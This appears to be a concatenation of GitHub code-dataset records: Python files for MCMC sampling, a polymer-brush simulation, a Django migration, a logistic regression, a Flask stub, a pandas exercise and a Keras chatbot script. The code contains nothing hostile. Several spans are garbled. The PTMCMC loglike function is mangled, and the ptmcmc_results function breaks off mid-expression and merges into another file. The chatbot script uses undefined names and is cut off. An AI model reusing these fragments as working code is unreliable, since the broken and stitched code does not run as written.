EmlidPPK).meters)\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","repo_name":"tvanderweide/SnowDrones","sub_path":"EmlidvsPythonPPK_Check.py","file_name":"EmlidvsPythonPPK_Check.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"9392384638","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nHandy PTMCMC scripts.\n\nAuthor:\n Dimitri Misiak (misiak@ipnl.in2p3.fr)\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.signal as sgl\nimport emcee\nimport corner\nimport os\nimport __main__\n\nimport sys\nfrom os import path\nsys.path.append( path.dirname( path.abspath(__file__) ) )\nfrom savesys import savetxt, loadtxt\n\n\ndef chi2(time, data_1, data_2, noise=1):\n \"\"\"Computes the chi2 function in frequency space.\n OLD FUNCTION NEEDED IN ANCIENT TEST FILES. DO NOT USE !!\n Parameters\n ----------\n data_1 : array_like\n First data array to be compared.\n data_2 : array_like\n Second data_array to be compared.\n noise : array_like or float\n PSD of the noise affecting the data.\n\n Returns\n -------\n x2 : float\n Value of the chi2 function. It should tends to dof if the data and\n noise are compatible.\n dof : int\n Degrees Of Freedom. Use to compute a normalized chi2.\n \"\"\"\n # computes the psd correction coefficient\n t_step = time[1] - time[0]\n t_len = time[-1] - time[0]\n psd_corr = 2 * t_step**2 / t_len\n\n # computes the fft of the data\n # removing the frequency 0, and cropping the negative frequencies\n # WILL NOT WORK FOR t_len > 0.999 !!!\n ind = int(t_step**-1 /2) +1\n d1 = np.fft.fft(data_1)[1:ind]\n d2 = np.fft.fft(data_2)[1:ind]\n\n # noise psd\n J = np.array(noise)\n\n # computes the chi2\n x2 = np.sum( psd_corr * np.abs(d1-d2)**2 / J )\n\n # computes the dof\n dof = len(d1)\n\n return x2, dof\n\ndef chi2_new(time, data_1, data_2, noise=1):\n \"\"\"Computes the chi2 function in frequency space.\n OLF FUNCTION NEEDED IN ANCIENT TEST FILES . DO NOT USE !!\n Parameters\n ----------\n data_1 : array_like\n First data array to be compared.\n data_2 : array_like\n Second data_array to be compared.\n noise : array_like or float\n PSD of the noise affecting the data.\n\n Returns\n -------\n x2 : float\n Value of the chi2 function. It should tends to dof if the data and\n noise are compatible.\n dof : int\n Degrees Of Freedom. Use to compute a normalized chi2.\n \"\"\"\n # computes the psd correction coefficient\n t_step = time[1] - time[0]\n t_len = time[-1] - time[0]\n psd_corr = 2 * t_step**2 / t_len\n\n # noise psd\n J = np.array(noise)\n\n # computes the chi2\n x2 = np.sum( psd_corr * np.abs(data_1-data_2)**2 / J )\n\n # computes the dof\n dof = len(data_1)\n\n return x2, dof\n\ndef ptmcmc_sampler(aux, bounds, nsteps, ntemps, nwalkers=None,\n condi=None):\n \"\"\" MCMC Analysis routine. Log scale seach in parameter space.\n\n Parameters\n ----------\n aux : function\n Minimized function. Should be a frequency chi2 function\n for proper results.\n bounds: array_like of tuple of 2 floats\n Starting parameter set for MCMC analysis.\n nsteps : int\n Number of steps.\n nwalkers : None or int, optional\n Numbers of walkers. Should not be inferior to 2 times\n the number of parameters. By default, set to 10 times\n the number of parameters.\n savename : str, optional\n Path the save directory\n Returns\n -------\n sampler : emcee.ensemble.EnsembleSampler\n Object manipulated by the mcmc. Has several class attributes which\n contain the Markov chain, the lnprob list, and other characteristics\n of the mcmc analysis.\n \"\"\"\n # extracts the sup bounds and the inf bounds\n bounds = list(bounds)\n binf = list()\n bsup = list()\n for b in bounds:\n inf, sup = b\n binf.append(inf)\n bsup.append(sup)\n binf = np.array(binf)\n bsup = np.array(bsup)\n\n # additionnal constrain as function of the parameters\n if condi == None:\n condi = lambda p: True\n\n # Loglikelihood function taking into accounts the bounds\n def loglike(x):\n \"\"\" Loglikelihood being -chi2/2.\n Take into account the bounds.\n \"\"\"\n cinf = np.sum(xbsup)\n if cinf == 0 and csup == 0 and condi(x) == True:\n# return -0.5*aux(np.power(10,x))\n return -0.5*aux(x)\n else:\n return -np.inf\n\n # number of parameters/dimensions\n ndim = len(bounds)\n\n # default nwalkers\n if nwalkers == None:\n nwalkers = 10 * ndim\n\n # walkers are uniformly spread in the parameter space\n ntemps = ntemps\n\n pos_temp = list()\n for k in range(ntemps):\n\n pos = list()\n for n in range(nwalkers):\n accept = False\n while not accept:\n new_pos = [\n np.random.uniform(low=l, high=h) for l,h in zip(binf, bsup)\n ]\n accept = condi(new_pos)\n pos.append(new_pos)\n\n pos_temp.append(pos)\n\n# pos_temp = np.random.uniform(low=-6.0, high=0.0, size=(ntemps, nwalkers, ndim))\n\n pos_temp = np.array(pos_temp)\n# print 'pos_temp.shape =', pos_temp.shape\n\n # MCMC analysis\n# sampler = emcee.EnsembleSampler(nwalkers, ndim, loglike)\n logp = lambda x: 0.0\n sampler = emcee.PTSampler(ntemps, nwalkers, ndim, loglike, logp)\n sampler.run_mcmc(pos_temp, nsteps, rstate0=np.random.get_state())\n\n return sampler\n\ndef save_ptmcmc_sampler(sampler, bounds, path='mcmc_sampler/autosave'):\n \"\"\" Save the data contained in the ptmcmc sampler.\n \"\"\"\n try:\n os.makedirs(path)\n except OSError:\n if not os.path.isdir(path):\n raise\n\n # saving the markov chain\n with open(os.path.join(path,'chain.dat'), 'w') as outfile:\n outfile.write('# Array shape: {0}\\n'.format(sampler.chain.shape))\n for data_temp in sampler.chain:\n for data_slice in data_temp:\n np.savetxt(outfile, data_slice)\n outfile.write('# Next walker\\n')\n outfile.write('# Next temperature\\n')\n\n # saving the lnprob\n lnprob = sampler._lnprob\n with open(os.path.join(path,'lnprob.dat'), 'w') as outfile:\n outfile.write('# Array shape: {0}\\n'.format(lnprob.shape))\n for data_temp in lnprob:\n np.savetxt(outfile, data_temp)\n outfile.write('# Next temperature\\n')\n\n # saving the acceptance fraction\n acc = sampler.acceptance_fraction\n with open(os.path.join(path,'acceptance.dat'), 'w') as outfile:\n outfile.write('# Array shape: {0}\\n'.format(acc.shape))\n for data_temp in acc:\n np.savetxt(outfile, data_temp)\n outfile.write('# Next temperature\\n')\n\n entries = ('source', 'bounds',\n 'dim', 'iterations', 'nwalkers', 'ntemps')\n\n try:\n source = __main__.__file__\n except:\n source = os.getcwd()\n\n values = (source, bounds,\n sampler.dim, sampler.chain.shape[2], sampler.nwalkers,\n sampler.ntemps)\n\n savetxt(entries, values, fpath=os.path.join(path ,'log.dat'))\n\n\ndef get_ptmcmc_sampler(sdir):\n \"\"\" Read the sampler info from disk created by mcmc_sampler.\n\n Parameters\n ----------\n sdir : str\n Save directory path.\n\n Returns\n -------\n logd : dict\n Contains the characteristics of the mcmc analysis.\n chain : ndarray\n Array of shape (nwalkers, nsteps, ndim). Contains the positions of\n all walkers for each iterations.\n lnprob : ndarray\n Array of shape (nwalkers, nsteps). Contains the log probability\n of all walkers for each iterations.\n \"\"\"\n # log chain, lnprob file path\n logpath = os.path.join(sdir, 'log.dat')\n chainpath = os.path.join(sdir, 'chain.dat')\n lnpath = os.path.join(sdir, 'lnprob.dat')\n accpath = os.path.join(sdir, 'acceptance.dat')\n\n # read log and extracts info into dict\n entries, values = loadtxt(logpath)\n logd = dict([(e,v) for e,v in zip(entries, values)])\n\n # extracting shape of the chain and lnprob arrays\n ndim = int(logd['dim'])\n nwalkers = int(logd['nwalkers'])\n nsteps = int(logd['iterations'])\n ntemps = int(logd['ntemps'])\n\n # read chain\n chain = np.loadtxt(chainpath)\n chain = chain.reshape((ntemps, nwalkers, nsteps, ndim))\n# chain = chain.reshape((ntemps * nwalkers, nsteps, ndim))\n\n # read lnprob\n lnprob = np.loadtxt(lnpath)\n lnprob = lnprob.reshape((ntemps, nwalkers, nsteps))\n\n beta = emcee.ptsampler.default_beta_ladder(ndim, ntemps)\n beta = beta.reshape( (ntemps, 1, 1) )\n lnprob = lnprob / beta\n# lnprob = lnprob.reshape((ntemps * nwalkers, nsteps))\n\n # read acceptance\n acc = np.loadtxt(accpath)\n acc = acc.reshape((ntemps, nwalkers))\n\n return logd, chain, lnprob, acc\n\n\ndef ptmcmc_plots(ntemps, ndim, chain, lnprob, acc, labels):\n\n cmap = plt.get_cmap('jet')\n cmap = cmap(np.linspace(0., 1., ntemps))\n\n for k in reversed(range(ntemps)):\n\n ch = chain[k]\n ln = lnprob[k]\n ac = acc[k]\n c = cmap[k]\n\n plt.figure('Acceptance fraction')\n plt.plot(ac, color=c)\n\n # CONVERGENCE plot\n fig = plt.figure(num='CONVERGENCE', figsize=(7,8))\n ax = fig.get_axes()\n # Check if the figure was already plotted.\n if not len(ax):\n fig, ax = plt.subplots(ndim+1, 1, sharex=True, figsize=(7, 8),\n num='CONVERGENCE')\n\n ax[-1].set_xlabel('Iterations')\n ax[-1].set_yscale('log')\n for a, l in zip(ax, labels + ('lnprob',)):\n a.set_ylabel(l)\n a.grid()\n\n # plotting the lnprob array and the cut threshold\n ax[-1].plot(-ln.T, color=c)\n\n # loop over the chains\n for chk, lnk in zip(ch, ln):\n for n in range(ndim):\n # plotting the accepted chain and their respective burnin\n ax[n].plot(chk[:,n].T, color=c, lw=0.1, alpha=1.0)\n ax[n].scatter([0], chk[0, n], color=c, marker='>')\n\n fig.tight_layout(h_pad=0.0)\n\n# samples = reduce(lambda a,b: np.append(a,b, axis=0), ch)\n samples = np.vstack(ch)\n\n best_ind = np.unravel_index(ln.argmax(), ln.shape)\n best_chi2 = -2 * ln[best_ind]\n xopt = ch[best_ind]\n\n if k == ntemps-1:\n fig_corner = corner.corner(samples, bins=50, smooth=1, color=c,\n labels=['{}'.format(l) for l in labels],\n quantiles=[0.16, 0.5, 0.84], show_titles=True,\n truths=xopt,\n title_kwargs={\"fontsize\": 12})\n else:\n corner.corner(samples, bins=50, smooth=1, color=c,\n labels=['{}'.format(l) for l in labels],\n quantiles=[0.16, 0.5, 0.84], show_titles=True,\n truths=xopt,\n title_kwargs={\"fontsize\": 12},\n fig = fig_corner)\n\n\ndef ptmcmc_results(ndim, chain, lnprob, acc, labels):\n\n # chains of lowest temperature\n chain = chain[0]\n lnprob = lnprob[0]\n acc = acc[0]\n\n # acceptance fraction cut\n tracc = (0.15, 0.8)\n ind = np.where(np.logical_or(acc < tracc[0], acc > tracc[1]))\n bam = chain[ind]\n chain = np.delete(chain, ind, axis=0)\n lnprob = np.delete(lnprob, ind, axis=0)\n\n# print 'shape chain:', chain.shape\n# print 'shape lnprob:', lnprob.shape\n\n plt.figure('Acceptance fraction Results')\n plt.plot(acc)\n for thresh in tracc:\n plt.axhline(thresh, color='r', ls='--')\n\n # CONVERGENCE plot\n fig, ax = plt.subplots(ndim+1, 1, sharex=True, figsize=(7, 8),\n num='CONVERGENCE RESULTS')\n ax[-1].set_xlabel('Iterations')\n ax[-1].set_yscale('log')\n for a, l in zip(ax, labels + ('lnprob',)):\n a.set_ylabel(l)\n a.grid()\n\n # loop over the parameters\n for n in range(ndim):\n\n if len(bam) > 0:\n # plotting the chains discarded by the acceptance cut\n ax[n].plot(bam[:, :, n].T, color='r', lw=1., alpha=0.4)\n\n # by default : no cut\n\n burnin_list = np.ones(lnprob.shape[0], dtype='int') * 0\n\n# # convergence cut with mean\n# lnlncut = np.mean(np.log10(-lnprob))\n# burnin_list = list()\n# for lnk in lnprob:\n# try:\n# burn = np.where(np.log10(-lnk) > lnlncut)[0][-1] + 100\n# except:\n# burn = 0\n# burnin_list.append(burn)\n#\n# ax[-1].axhline(np.power(10,lnlncut), color='r')\n\n # convergence cut with best prob\n lncut = 1.1 * lnprob.max()\n# lncut = -300\n ax[-1].axhline(-lncut, color='r')\n\n burnin_list = list()\n safe_burn = 100\n for lnk in lnprob:\n try:\n burn = np.where(lnk < lncut)[0][-1] + safe_burn\n except:\n print('Could not apply convergence cut properly')\n burn = safe_burn\n burnin_list.append(burn)\n\n # plotting the log10(-lnprob) array and the cut threshold\n ax[-1].plot(-lnprob.T, color='k')\n\n chain_ok_list = list()\n # loop over the chains\n for chk, brn, lnk in zip(chain, burnin_list, lnprob):\n\n # iterations array\n ite = range(chk.shape[0])\n\n # converged chain and saving it\n ite_ok = ite[brn:]\n chk_ok = chk[brn:, :]\n lnk_ok = lnk[brn:]\n chain_ok_list.append(chk_ok)\n\n # not converged chain\n ite_no = ite[:brn]\n chk_no = chk[:brn, :]\n\n # loop over the parameters\n for n in range(ndim):\n\n # plotting the accepted chain and their respective burnin\n ax[n].plot(ite_ok, chk_ok[:,n].T, color='b', lw=0.1, alpha=1.0)\n ax[n].plot(ite_no, chk_no[:,n].T, color='k', lw=0.1, alpha=0.4)\n ax[n].scatter([0], chk[0, n], color='r', marker='>')\n\n # plotting converged chain lnprob\n ax[-1].plot(ite_ok, -lnk_ok.T, color='b', lw=0.1, zorder=10)\n\n fig.tight_layout(h_pad=0.0)\n\n# samples = reduce(lambda a,b: np.append(a,b, axis=0), chain_ok_list)\n samples = np.vstack(chain_ok_list)\n\n best_ind = np.unravel_index(lnprob.argmax(), lnprob.shape)\n best_chi2 = -2 * lnprob[best_ind]\n xopt = chain[best_ind]\n\n\n# # checking the correlation\n# fig, ax = plt.subplots(2, sharex=True)\n# for a in ax:\n# a.grid()\n# a.set_xscale('log')\n# ax[1].set_xlabel('Iterations')\n# ax[1].set_ylabel('Corr p0')\n# ax[0].set_ylabel('p0')\n#\n# for c in chain[:,:,0]:\n# funk = emcee.autocorr.function(c)\n# ax[0].plot(c)\n# ax[1].plot(funk)\n\n # CORNER plot\n# aux_fig, ax = plt.subplots(ndim,ndim,num='CORNER', figsize=(ndim,ndim))\n fig = corner.corner(samples, bins=50, smooth=1,\n labels=['{}'.format(l) for l in labels],\n quantiles=[0.16, 0.5, 0.84], show_titles=True,\n truths=xopt,\n title_kwargs={\"fontsize\": 12})#, fig=aux_fig)\n fig.tight_layout()\n\n # quantiles of the 1d-histograms\n inf, med, sup = np.percentile(samples, [16, 50, 84], axis=0)\n\n # Analysis end message\n print(\"PTMCMC results :\")\n for n in range(ndim):\n print(labels[n]+'= {:.2e} + {:.2e} - {:.2e}'.format(\n med[n], sup[n]-med[n], med[n]-inf[n]\n ))\n for n in range(ndim):\n print(labels[n]+'\\in [{:.3e} , {:.3e}] with best at {:.3e}'.format(\n inf[n], sup[n], xopt[n]\n ))\n if not np.all(np.logical_and(inf Frame:\n if n <= 0:\n comp1 = f\"(X1)1((A1){m}){Nb//m-1}(A1){m}\"\n comp2 = f\"(X2)1((A2){m}){Nb//m-1}(A2){m}\"\n else:\n comp1 = f\"(X1)1((A1){m}[(A1){n}]){Nb//m-1}(A1){m}\"\n comp2 = f\"(X2)1((A2){m}[(A2){n}]){Nb//m-1}(A2){m}\"\n theta = (Nb + 1 + (Nb // m - 1) * n) * sigma\n lat = Lat(\n **{\n \"n_layers\": n_layers,\n \"geometry\": \"flat\",\n \"lowerbound\": \"surface\",\n \"upperbound\": \"surface\",\n }\n )\n mons = [\n Mon(**{\"name\": \"X1\", \"freedom\": \"pinned\", \"pinned_range\": \"1\"}),\n Mon(**{\"name\": \"A1\", \"freedom\": \"free\"}),\n Mon(**{\"name\": \"X2\", \"freedom\": \"pinned\", \"pinned_range\": str(n_layers)}),\n Mon(**{\"name\": \"A2\", \"freedom\": \"free\"}),\n Mon(**{\"name\": \"W\", \"freedom\": \"free\"}),\n ]\n mols = [\n Mol(**{\"name\": \"Water\", \"composition\": \"(W)1\", \"freedom\": \"solvent\"}),\n Mol(\n **{\n \"name\": \"pol1\",\n \"composition\": comp1,\n \"freedom\": \"restricted\",\n \"theta\": theta,\n }\n ),\n Mol(\n **{\n \"name\": \"pol2\",\n \"composition\": comp2,\n \"freedom\": \"restricted\",\n \"theta\": theta,\n }\n ),\n ]\n sys = Sys()\n chi = 0.0\n chi_list = {\"X1 W\": chi, \"A1 W\": chi, \"X2 W\": chi, \"A2 W\": chi}\n\n frame = Frame(lat, sys, mols, mons, chi_list=chi_list)\n frame.run()\n print(frame.profile_labels)\n\n return frame\n\n\nif __name__ == \"__main__\":\n params = [[160, 56, 10], [136, 54, 8], [112, 8, 1]]\n\n sigma = 0.01\n for p in params:\n Nb, n, m = p\n data = []\n theta = (Nb + 1 + (Nb // m - 1) * n) * sigma\n\n for n_layers in range(42, 116, 2):\n frame = brushes(Nb, n, m, n_layers, sigma)\n omega_L = np.sum(frame.profile[\"pol1\"] * frame.profile[\"pol2\"])\n if len(frame.profile[\"pol1\"]) % 2 == 0:\n first_layer = len(frame.profile[\"pol1\"]) // 2 + 1\n H = 2 * (\n np.sum(\n frame.profile[\"pol1\"][first_layer:]\n * (frame.profile[\"layer\"][first_layer:] + 0.5 - first_layer)\n )\n / np.sum(frame.profile[\"pol1\"][first_layer:])\n )\n data.append(\n [n_layers, H, omega_L, frame.stats[\"sys : name : free energy\"]]\n )\n print(n_layers)\n\n data = np.array(data).T\n path = os.path.abspath(__file__)\n np.savetxt(f\"{path[:path.rfind('/',2)]}/Nb{Nb}n{n}m{m}.txt\", data)\n \n","repo_name":"IvanMikhailovIMCRAS/brush_penetration","sub_path":"brush_penetration/brush_penetration.py","file_name":"brush_penetration.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20687487396","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('contrib', '0039_alter_field_url_on_menuextra'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='defensoria',\r\n name='pode_cadastrar_atividade_extraordinaria',\r\n field=models.BooleanField(default=False, help_text='Habilita CRUD de Atividade Extraordin\\xe1ria no painel do Defensor Atuante', verbose_name='Pode cadastrar Atividade Extraordin\\xe1ria?'),\r\n ),\r\n migrations.AlterField(\r\n model_name='menuextra',\r\n name='url',\r\n field=models.URLField(blank=True),\r\n ),\r\n ]\r\n","repo_name":"SegurancaDPDF/SOLAR-Backend","sub_path":"contrib/migrations/0040_atividades_extraordinarias.py","file_name":"0040_atividades_extraordinarias.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15683331510","text":"N = list(map(int, input().split()))\nx = min(N)\nwhile True:\n cnt = 0\n for i in range(5):\n if x % N[i] == 0:\n cnt += 1\n if cnt > 2:\n print(x)\n break\n x += 1\n","repo_name":"Jihyun-Choi/Algorithm","sub_path":"BOJ/python/math/1145.py","file_name":"1145.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24029161417","text":"import numpy as np\n\n\nclass LogisticRegression(object):\n def __init__(self, tol=0.001, max_iter=1000, penalty='norm', C=1):\n \"\"\"\n self.weights weight\n self.tol threshold\n self.max_iter maximum iteration\n self.C Regularization term before coefficients\n self.penalty regularization\n \"\"\"\n self.weights = None\n self.tol = tol\n self.max_iter = max_iter\n self.C = C\n self.penalty = penalty\n\n def sigmoid(self, z):\n return 1 / (1 + np.exp(-z))\n\n # same as sklearn.fit\n def fit(self, dataMatIn, classLabels):\n dataMatrix = np.mat(dataMatIn) # matrix\n labelMat = np.mat(classLabels)\n m, n = np.shape(dataMatrix) # dim\n self.weights = np.ones((n, 1)) # init: 1\n\n for i in range(self.max_iter):\n # Assume that the function\n h = self.sigmoid(dataMatrix * self.weights) # compress to 0-1, pos/neg\n # Regularization term, according to the gradient metric inferred, without the regularization term, L1 regular, L2 regular parameter update logic\n if self.penalty == 'norm':\n # matrix multiple (sample few, x grient down)\n self.weights = self.weights + self.tol * dataMatrix.transpose() * (labelMat - h)\n elif self.penalty == 'l1':\n # lambda\n self.weights = self.weights + self.C * self.tol * np.where(self.weights > 0, 1, -1) + self.tol * dataMatrix.transpose() * (labelMat - h)\n elif self.penalty == 'l2':\n self.weights = self.weights * (1 - self.C * self.tol) + self.tol * dataMatrix.transpose() * (labelMat - h)\n\n # Same role as sklearn.predict_pro, return probability\n def predict_pro(self, dataMatIn):\n dataMatrix = np.mat(dataMatIn)\n return self.sigmoid(dataMatrix * self.weights)\n\n # Same role as sklearn.predict, return category\n def predict(self, dataMatIn):\n dataMatrixPro = self.predict_pro(dataMatIn)\n return np.where(dataMatrixPro >= 0.5, 1, 0).reshape(len(dataMatIn), )\n\n # Same as sklearn.score, accuracy\n def score(self, dataMatIn, classLabels):\n yhat = self.predict(dataMatIn).reshape(len(dataMatIn), )\n y = np.array(classLabels).reshape(len(classLabels), )\n return np.sum(np.where((yhat == y) == True, 1, 0)) / len(y)\n\n\n# calculate accuracy score\ndef accuracy_score(y, yhat):\n y = np.array(y).reshape(len(y), )\n yhat = np.array(yhat).reshape(len(yhat), )\n return np.sum(np.where((yhat == y) == True, 1, 0)) / len(y)\n\n\n# calculate precision score\ndef precision_score(y, yhat):\n y = np.array(y).reshape(len(y), )\n yhat = np.array(yhat).reshape(len(yhat), )\n return sum(yhat * y) / np.sum(yhat)\n\n\n# calculate recall score\ndef recall_score(y, yhat):\n y = np.array(y).reshape(len(y), )\n yhat = np.array(yhat).reshape(len(yhat), )\n return sum(yhat * y) / np.sum(y)\n\n\n# calculate f1 score\ndef f1_score(y, yhat):\n p = precision_score(y, yhat)\n r = recall_score(y, yhat)\n return 2 * p * r / (p + r)\n\n\n# calculate confusion matrix\ndef confusion_matrix(y, yhat):\n y = np.array(y).reshape(len(y), )\n yhat = np.array(yhat).reshape(len(yhat), )\n num1 = sum(yhat * y)\n num2 = sum(np.where(yhat == 0, 1, 0) * y)\n num3 = sum(np.where(y == 0, 1, 0) * yhat)\n num4 = sum(np.where(y == 0, 1, 0) * np.where(yhat == 0, 1, 0))\n return np.array([[num4, num3], [num2, num1]])\n","repo_name":"shixun404/CS235_Obesity_Detection","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"70998794812","text":"import random\n\ndef lotteryNumbers():\n listOfNumbers = []\n\n while len(listOfNumbers) < 5:\n a = random.randint(1,70)\n if a not in listOfNumbers:\n listOfNumbers.append(a)\n listOfNumbers.sort()\n\n m = random.randint(1,25)\n listOfNumbers.append(m)\n return listOfNumbers\n\nprint(lotteryNumbers())\n\n\n# pool = list(range(1, 71))\n# random.sample(pool, 5)\n\n","repo_name":"cthompson7/MIS3640","sub_path":"Session14/in-class-IO-TA.py","file_name":"in-class-IO-TA.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24866671333","text":"from flask import Flask, render_template, redirect\nimport time\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n # Render the loading screen template\n return render_template('loading.html')\n\n@app.route('/home')\ndef home():\n products = [\n {\"title\": \"Product 1\", \"description\": \"Description 1\", \"price\": \"9.99\"},\n {\"title\": \"Product 2\", \"description\": \"Description 2\", \"price\": \"19.99\"},\n {\"title\": \"Product 3\", \"description\": \"Description 3\", \"price\": \"29.99\"},\n ]\n # Simulate a delay or time-consuming task\n \n # Render the home template with the products data\n return render_template('home.html', products=products)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"desalvatoredaniel/philanthropicthrift","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17034655627","text":"import pandas as pd\nimport uni\n\n\nworkouts = pd.read_csv('workouts.csv')\npayments = pd.read_excel('payments.xlsx')\nusers = pd.read_excel('users.xlsx')\nworkouts.reset_index()\n# print(users.loc[[4268, 4272]]) # достаем данные из строк 4268 и 4272\n# print(users.loc[[4268, 4272], ['region', 'first_contact_datetime']]) # достаем только столбцы region и first_contact_datetime для строк 4268 и 4272\n# print(users.loc[users['geo_group'] == 'Москва']) # фильтрация данных по городу Москва\n# print(users.loc[users['age'] <= 30.0].head) # выведет все данные о пользователях младше 30 (включительно)\npd.to_datetime(payments['payment_date']) # изменили данные в колонке, но только на эту итерацию, в DataFrame они не изменились\npayments['payment_date'] = pd.to_datetime(payments['payment_date']) # изменили данные в DataFrame\nworkouts['start_at'] = pd.to_datetime(workouts['start_at'])\nusers.groupby('geo_group')['age'].max() # находим максимальный возраст тренирующихся по гео-группе\nworkouts.groupby('trainer_department')['client_id'].nunique() # узнаем кол-во клиентов у которых занятия проводили тренеры из разных департаментов\nworkouts.reset_index(inplace=True) # переносим индекс в колонку\nworkouts.groupby('trainer_department')['workout_id'].nunique() # какое кол-во занятий провели тренеры разных департаментов\nworkouts.groupby(['trainer_department', 'workout_type'])['workout_id'].nunique() # какое кол-во занятий провели тренеры разных департаментов по разным типам тренировок\nworkouts['client_id'].groupby(workouts['start_at'].dt.month).nunique() # сколько клиентов пришли на тренировки помесячно\nworkouts['cost'].agg(['count', 'mean', 'median']) # выводим сразу несколько показателей (только те, что нам нужны)\nworkouts.agg(\n {\n 'cost': ['count', 'mean', 'median'],\n 'workout_id': ['count', 'nunique']\n }\n) # считаем для разных столбцов разные статистики (показатели/ агрегаты)\n\nfirst_payments = payments.groupby('user_id')['payment_date'].min()\nfirst_workout = workouts.groupby('client_id')['start_at'].min()\n# pd.merge(payments, users) # объединение таблиц\nworkouts_users = pd.merge(workouts, users, how='left', left_on='client_id', right_on='user_id')\n\nfirst_payments = first_payments.reset_index()\nfirst_workout = first_workout.reset_index()\nusers_info = pd.merge(first_payments, first_workout, how='inner', left_on='user_id', right_on='client_id')\n\n# добавление колонок\npayments['version'] = 1\npayments['fix_rate'] = 73\npayments['amount_usd'] = payments['amount'] / payments['fix_rate']\n\nusers_info['date_diff'] = users_info['payment_date'] - users_info['start_at']\nusers_info.sort_values(by='date_diff') # сортировка по колонке date_diff по умолчанию (по возрастанию)\nusers_info.sort_values(by='date_diff', ascending=False) # сортировка по колонке date_diff по убыванию\n\n\nmean_value = users_info['date_diff'].mean()\ndef checher(datediff_in_days):\n if datediff_in_days < mean_value:\n return 'Быстрый'\n else:\n return 'Медленный'\n\n\nusers_info['client_type'] = users_info['date_diff'].apply(checher)\n\nusers_info.to_excel('user_info.xlsx')\n\nwriter = pd.ExcelWriter('all_data.xlsx')\nusers_info.to_excel(writer, sheet_name='payments')\npayments.to_excel(writer, sheet_name='payments')\nusers.to_excel(writer, sheet_name='users')\nworkouts.to_excel(writer, sheet_name='workouts')\n\nwriter.save()\n\n\nprint(users_info)\n\n\n","repo_name":"BariGisher20/Python--","sub_path":"PANDAS/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35302569501","text":"import json\r\nimport nltk\r\nimport numpy as np\r\nfrom nltk.stem import WordNetLemmatizer\r\nlem=WordNetLemmatizer()\r\nimport tensorflow\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense,Embedding,LSTM,Flatten\r\nimport pickle\r\n\r\n\r\n\r\n'''extracting the data set'''\r\nwith open('intents.json','r') as f:\r\n data=json.load(f)\r\n\r\n'''assigning the data'''\r\nwords=[]\r\ndocument=[]\r\nclasses=[]\r\nign=['?','.','!',',']\r\nfor intent in data['intents']:\r\n for pattern in intent['patterns']:\r\n w=nltk.word_tokenize(pattern)\r\n words.extend(w)\r\n document.append((w,intent['tag']))\r\n if intent['tag'] not in classes:\r\n classes.append(intent['tag'])\r\ndoc=[]\r\nfor d in document:\r\n\tdoc.append(d[0])\r\n\r\n\r\n'''szorting the data'''\r\nwords=[lem.lemmatize(w.lower())for w in words if w not in ign]\r\nwords=sorted(list(set(words)))\r\nclasses=sorted(list(set(classes)))\r\n\r\nlists=[]\r\ndef reemovNestings(l): \r\n for i in l: \r\n if type(i[0]) == list: \r\n reemovNestings(i) \r\n else:\r\n a=''\r\n for j in i:\r\n a=a+' '+ j\r\n lists.append(a)\r\nreemovNestings(doc)\r\n\r\n\r\n'''creating files'''\r\n\r\npickle.dump(words,open('word.pkl','wb'))\r\npickle.dump(classes,open('classes.pkl','wb'))\r\n\r\n'''training'''\r\n\r\ntraining=[]\r\noutput=[0]*len(classes)\r\ndef reemovNestings(l): \r\n for i in l: \r\n if type(i[0]) == list: \r\n reemovNestings(i) \r\n else:\r\n a=''\r\n for j in i:\r\n a=a+' '+ j\r\n output.append(a)\r\nreemovNestings(doc)\r\nprint(output)\r\nmax_len=7\r\nencoded_words=[]\r\nencoded_words=[one_hot(w, size,filters='!?',lower=True) for w in lists]\r\npadded_sentence=pad_sequences(encoded_words,max_len,padding='post')\r\n\r\nfor doc in document:\r\n out=list(output)\r\n out[classes.index(doc[1])]=1\r\n training.append([out])\r\n\r\n\r\ntraining=np.array(training)\r\ntrain_y=list(training)\r\ntrain_y=np.array(train_y)\r\n\r\n\r\n'''model 